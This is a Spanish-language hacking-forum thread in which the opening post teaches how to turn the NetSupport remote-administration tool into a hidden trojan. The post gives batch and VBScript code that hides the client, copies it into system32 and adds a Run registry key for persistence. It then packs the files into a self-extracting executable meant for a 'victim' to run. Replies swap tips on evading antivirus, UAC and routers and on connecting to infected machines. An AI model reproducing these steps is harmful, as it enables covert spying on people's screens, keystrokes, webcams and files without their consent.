elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 11:00  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Troyanizando NetSupport Indetectable
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando NetSupport Indetectable  (Leído 8,500 veces)
ASSaulting

Desconectado Desconectado

Mensajes: 28


ASSaulting The Eardrum


Ver Perfil
Troyanizando NetSupport Indetectable
« en: 3 Junio 2009, 01:24 »

Hola a todos,en este tutorial boi a enseñar a "preperar" un troyano 100% INDETECTABLE,se trata de NetSupport...El mejor programa de administracion remota que existe actualmente.

Lo que haremos sera hacerlo "invisible" para que la victima cuando lo ejecute no se de cuenta y tambien añadiremos unos "copy" y unos "reg add" en batch para que la victima solo tenga que ejecutar el troyano una vez y despues nuestro batch lo ejecutara por la victima  ;D.

Empecemos por descargarnos el software,lo podeis descargar desde la página oficial www.netsupport-inc.com aunke ai que registrarse i todo ese royo,lo podeis encontrar tambien por taringa (os e aorrado el trabajo en buscarlo ;))

Dscarga desde Megaupload (con keygen):
http://usuario-buscatelo-tumismo.com
Una vez descargado lo descomprimimos y lo instalamos en la carpeta por defecto.

Ahora vamos al directorio donde se instalo (por defecto C:\Program Files\NetSupport\NetSupport Manager),cuando acabeis de acer mariconadas con el controlador abrir el "pcicfgui.exe" click en "advanced" despues "master profile/edit" nos vamos a "client interface/client settings" y desmarcamos la casilla "icon in system tray" y marcamos la casilla "quiet mode" para ocultar el troyano,guardamos y cerramos.

Despues creamos una carpeta en el escritorio por ejemplo y metemos alli los archivos que nos aran falta para el troyano (client32.exe,client32.ini,nsm.lic,pcicapi.dll,pcichek.dll,pcicl32.dll,tcctl32.dll) copiamos y pegamos.

Lo siguiente es crear nuestros batch para que se inicie automaticamente cada vez que la victima encienda el pc,crearemos nuestro primer batch
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.bat"[/newbies]

Código:
start client32.exe
exit

Este se encargara de ejecutar el troyano,lo guardaremos como "thumbs.bat",crearemos tambien un vbscript para que no se vea la ventana del shell y que no sea tan sospechoso
[newbies]abrir bloc de notas escribir el codigo y darle a guardar con el formato "*.vbs"[/newbies]

Código:
set objshell = createobject("wscript.shell")
objshell.run "thumbs.bat", vbhide

Lo guardaremos como "vbscript-thumbs.vbs".

Ahora crearemos el que tendra que ejecutar la victima,este se encarga de copiar todos los archivos a system32 y crear una entrada en el registro para que se autoinicie.

Código:
start vbscript-thumbs.vbs
copy "client32.exe" "%windir%\system32" /Y
copy "nsm.lic" "%windir%\system32" /Y
copy "pcicapi.dll" "%windir%\system32" /Y
copy "pcichek.dll" "%windir%\system32" /Y
copy "pcicl32.dll" "%windir%\system32" /Y
copy "tcctl32.dll" "%windir%\system32" /Y
copy "client32.ini" "%windir%\system32" /Y
copy "thumbs.bat" "%windir%\system32" /Y
copy "vbscript-thumbs.vbs" "%windir%\system32" /Y
copy "vbscript-start.vbs" "%windir%\system32" /Y
reg add hkcu\software\microsoft\windows\currentversion\run /v Thumbs /t reg_sz /d %windir%\system32\vbscript-thumbs.vbs /f
exit

Lo llamaremos "start.bat" y tambien crearemos el vbscript

Código:
set objshell = createobject("wscript.shell")
objshell.run "start.bat", vbhide

Guardarlo como "vbscript-start.vbs".

Ya tenemos casi todo echo,al ejecutar el "vbscript-start.vbs" se ejecutara el troyano y se copiara al registro,ahora comprimiremos todos los archivos con "sfx compiler" para que kede uno solo,lo podeis descargar desde http://sfx-compiler.uptodown.com/descargar/.

Ejecutamos sfx compiler y añadimos todos los archivos que tenemos en la carpeta,vamos a "options"
-file to run after extraction: ponemos "vbscript-start.vbs"
-file to run before extraction: <<none>>
-window tittle: lo dejamos en blanco
-custom text: en blanco
-default folder: en blanco
-include folders names in sfx: desmarcado
-display done message: desmarcado
-do not prompt user for folder selection: marcado
-ask user when over writing files: desmarcado
-(seleccionamos windows temp folder)
-ok button caption: en blanco
-cancel button caption: en blanco
-note: en blanco
-banner image: <<none>

Le damos a crear y le ponemos cualkier nombre y ya tendremos nuestro troyano acabado.

Crearemos tambien un desinfectador para borrar el troyano... :)

Creamos otro batch y le ponemos este codigo:

Código:
del "%windir%\system32\client32.exe" /f /q
del "%windir%\system32\client32.ini" /f /q
del "%windir%\system32\thumbs.bat" /f /q
del "%windir%\system32\vbscript-thumbs.vbs" /f /q
del "%windir%\system32\vbscript-start.vbs" /f /q
del "%windir%\system32\nsm.lic" /f /q
del "%windir%\system32\pcicapi.dll" /f /q
del "%windir%\system32\pcichek.dll" /f /q
del "%windir%\system32\pcicl32.dll" /f /q
del "%windir%\system32\tcctl32.dll" /f /q
reg delete hkcu\software\microsoft\windows\currentversion\run /v Thumbs /f
taskkill -im client32.exe
taskkill -im client32.exe
exit

Lo guardamos como desinfectador.bat o lo que kerais vosotros y ya tenemos todo,espero que os aya gustado si copiais este tutorial para otro foro o lo que sea poner que es mio (ASSaulting).

Para dudas responder poniendo vuestra duda
Para critikas y demas comerme los ******* ;) un saludo.

Funciones del troyano:

-Ver lo que esta haciendo la victima desde su monitor.
-Controlar el mouse de la victima.
-Controlar el teclado de la victima.
-Transferencia de archivos.
    -Descargar archivos.
    -Subir archivos.
    -Ejecutar archivos remotamente.
    -Renombrar archivos.
    -Eliminar archivos.
-Iniciar chat con la victima.
-Enviar un mensage a la victima.
-Apagar,reiniciar o cerrar sesion de la victima.
-Ver video y audio de camara web y altavoces.
-Comandos remotos.
-Y alguna cosa mas...

Novlucker ha ayudado ha mejorar el troyano,gracias  ;)

Editado:Podeis escribir algunas mejoras para ayudar a todos o tambien si veis algun error,gracias  ;)
« Última modificación: 4 Junio 2009, 15:33 por ASSaulting » En línea

La frase de la abajo dice la verdad.
La frase de la arriba dice una mentira.
solitario101

Desconectado Desconectado

Mensajes: 17


Vive y deja Vivir


Ver Perfil WWW
Re: Crear Troyano Indetectable
« Respuesta #1 en: 3 Junio 2009, 20:34 »

MM parece bueno pero veo mas difixil hasta hacer un gusano , ... pero weno  si eso esta noxe preuba aver que tal.
En línea



Quieres desafiarme?
ASSaulting

Desconectado Desconectado

Mensajes: 28


ASSaulting The Eardrum


Ver Perfil
Re: Crear Troyano Indetectable
« Respuesta #2 en: 4 Junio 2009, 01:48 »

Funciona correctamente si es lo que preguntas (;
En línea

La frase de la abajo dice la verdad.
La frase de la arriba dice una mentira.
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.634



Ver Perfil
Troyanizando NetSupport Indetectable
« Respuesta #3 en: 4 Junio 2009, 04:45 »

Curioso   ;-) , es como troyanizar un vnc, no le he metido leche pero vamos aver que pasa en la semana.

Saludos
MITM

Te pongo xinxeta temporal, para ver alguien lo enchula un poco mas, por que eso de extensión vbs no mola ni en pelea de perros.
« Última modificación: 4 Junio 2009, 04:47 por Man-In-the-Middle » En línea
ternet

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #4 en: 4 Junio 2009, 10:30 »

hola me gustaria saber, cuando ya tengo todo hecho y demas, como hago con el netsupport para que el cliente se conecte? ahi es donde me pierdo porque supongo que el cliente tendria que conectar a mi pc, sin embargo no veo nada donde ponga que se debe de conectar a mi :S
« Última modificación: 4 Junio 2009, 11:26 por ternet » En línea
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.225


Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #5 en: 4 Junio 2009, 13:33 »

Citar
... para ver alguien lo enchula un poco mas, por que eso de extensión vbs no mola ni en pelea de perros ...
Eso no lo entendí MITM, a que te refieres con lo de la extensión vbs? el vbs es solo para ejecutar los bat's ocultos sin que se vea el pantallazo negro, es decir, el vbs es solamente un script para hacer las "tareas", el sfx sigue teniendo la extensión de siempre, EXE :P

Eso si, deberían de hacerse un par de cambios:
Primero que nada no utilizar rutas como C:\windows\system32, sino utilizar algo como %windir%\system32, para cuando la partición del SO cambia.
Y segundo, cambiar la ruta de hklm\software\microsoft\windows\currentversion\run, ya que es accesible solo para "admins" (aunque el 90% de los usuarios domésticos no utilice cuentas limitadas), se podría utilizar hkcu, pero igualmente algunos AV's monitorean esas entradas, un link en la carpeta de Inicio podría servir (paradójicamente) y ser una opción

Saludos


P.D: esto me recuerda que en algún momento tenía pensado dejar un tuto de como troyanizar "algo" he incluír hamachi, pero nunca se dió el momento :-\
« Última modificación: 4 Junio 2009, 13:48 por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

ASSaulting

Desconectado Desconectado

Mensajes: 28


ASSaulting The Eardrum


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #6 en: 4 Junio 2009, 15:25 »

Citar
hola me gustaria saber, cuando ya tengo todo hecho y demas, como hago con el netsupport para que el cliente se conecte? ahi es donde me pierdo porque supongo que el cliente tendria que conectar a mi pc, sin embargo no veo nada donde ponga que se debe de conectar a mi :S
aki el cliente es en lo que los troyanos tienes como server y el cliente es el controlador,asi que la victima tiene que ejecutar el cliente i tu controlas el cliente desde tu controlador,no se si me entiendes,si tienes mas dudas escribe  ;)

Nuvlucker:
es verdad que se podrian acer cientoas de mejoras ya que no le e tomado mucho tiempo pero siempre podeis escribir nuevas mejoras o incorrecciones que tengan, ;D
En línea

La frase de la abajo dice la verdad.
La frase de la arriba dice una mentira.
Niko7r

Desconectado Desconectado

Mensajes: 0


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #7 en: 4 Junio 2009, 16:08 »

hola a todos, antes que nada dar las gracias a ASSaulting por esta información bastante buena. Pues queria comentar que he estado leyendalo y haciendola y me parece muy interesante, solo que tengo algunas dudas... el archivo que creamos e este tuto (''server'') necesita que lo acompañemos de algún av killer o av firewall??, porque cuando la victima lo ejecute el firewall no nos dara permiso supongo; y mi otra duda es si cuando la victima ejecuta y se ''infecta'' nos da la notificación a nosotros, es decir, si existe la conexión inversa o en su caso debe de ser manual ??.. gracias y un saludo. :)
En línea
A2Corp

Desconectado Desconectado

Mensajes: 290



Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #8 en: 4 Junio 2009, 16:45 »

otro problemilla seria el router, no?
Creo que no tiene opcion de conexion inversa y el router nos daria problemitas.


Por lo del firewall de windows no creo que cante:
Soporte a la conectividad vía un componente HTTP Gateway, permitiendo asegurar las comunicaciones a través de internet sin necesidad de realizar cambios en el firewall local o en la red.


Porque las copias a system32?
Yo estoy algo traumado con win vista y no meto nada a system32 ni windows porque el UAC lo bloquea, es cierto q muchos no usan vista pero mas vale prevenir.
Podrias hacer q se guarde en la carpeta C y luego ponerla en hidden, no?
una recomendacion  :-X
« Última modificación: 4 Junio 2009, 17:01 por A2Corp » En línea

Hackeo, luego existo...
Niko7r

Desconectado Desconectado

Mensajes: 0


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #9 en: 4 Junio 2009, 17:38 »

si, tienes razón creo que el tema del router sería una putada. Por cierto, ya que no trae opción conexión inversa como consigues conectarte con el infectado.. me sale un icono que pone actualizar (para buscar clientes como si fuese conexion inversa :o) donde conecto yo con mis infectados?? es decir dond meto la ip dl infectado o como es.. investigo y no encuentro, saludos.
En línea
ternet

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #10 en: 4 Junio 2009, 18:24 »

si, tienes razón creo que el tema del router sería una putada. Por cierto, ya que no trae opción conexión inversa como consigues conectarte con el infectado.. me sale un icono que pone actualizar (para buscar clientes como si fuese conexion inversa :o) donde conecto yo con mis infectados?? es decir dond meto la ip dl infectado o como es.. investigo y no encuentro, saludos.

me pasa igualito a ti... hago todo pero luego llego al control para conectarme y no se por donde empezar
En línea
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.634



Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #11 en: 5 Junio 2009, 00:36 »

vale la correccion Novlucker  :D
En línea
ASSaulting

Desconectado Desconectado

Mensajes: 28


ASSaulting The Eardrum


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #12 en: 5 Junio 2009, 01:31 »

Hola de nuevo,antes de nada decir que es de conexion directa,lo de buscar clientes es por si esta infectado alguien que este usando tu misma conexion (un ciber por ejemplo usan todo sla misma red) otro ejemplo seria que tuvieses un hermano i usarais ordenadores distintos conextados por wifi,espero que lo alla explicado bien.

Segundo punto: puse system32 porke a esa carpeta no suele entrar la gente y si entra aver kien es el wapo que encuentra los archivos  ;D (ya sabreis por que),podeis cambiar el directorio de todas formas...

Siguiente punto: Como que no encontrais el icono para conectaros??xD le dais a new/client y ai poneis el nombre que le kereis iamar a la victima le dais a siguiente y poneis la direccion ip de la victima despues finalizar i os conectais xD,si seguis sin encontrarlo escribiz i os pongo una foto o algo  :xD

Otro punto: lo de agregar un firewall killer es opcional,el firewall de windows no canta porke es una ***** i weno i usan el de algun av weno pues talvez cante pero agregazlo vosotros si kereis.

Ultimo punto: Si,si que se puede copiar a C:\ y ponerlo oculto pero puede que la victima tenga puesto ver archivos ocultos.

Un saludo  :)
En línea

La frase de la abajo dice la verdad.
La frase de la arriba dice una mentira.
A2Corp

Desconectado Desconectado

Mensajes: 290



Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #13 en: 5 Junio 2009, 02:32 »

Citar
Ultimo punto: Si,si que se puede copiar a C:\ y ponerlo oculto pero puede que la victima tenga puesto ver archivos ocultos.

claro tienes razon en system32 es mucho mas seguro pk es algo mas dificil de encontrar el virus y la gente no busca ahi, solo te decia por si la pc infectada tiene winVista y si tiene este OS es casi seguro que tenga el UAC activado y ese no deja mover nadita de c:\windows\ para adentro
En línea

Hackeo, luego existo...
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.225


Yo que tu lo pienso dos veces


Ver Perfil
Re: Troyanizando NetSupport Indetectable
« Respuesta #14 en: 5 Junio 2009, 05:45 »

Bueno, probando un poco este soft veo que como ha dicho MITM se lo puede "enchular" para que quede mejor, y más allá de algunos cambios que personalmente le realizaría, como ser ocultarlo en otra carpeta y el link en la carpeta Inicio, en un rato de "inspiración" he podido apañar esto ...

Hola de nuevo,antes de nada decir que es de conexion directa ...

Ya tengo uno de conexión inversa ::), pero lo que no me convence es que hay que agregarle varios Mb más, con lo que el SFX resultante pasa de unos 900 kb (que ya no es poco) a unos 3 Mb, así que no creo que valga la pena :¬¬

Saludos

Nota: hay que tener en cuenta de que el instalador original de este soft pesa unos 32 Mb
« Última modificación: 5 Junio 2009, 13:35 por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines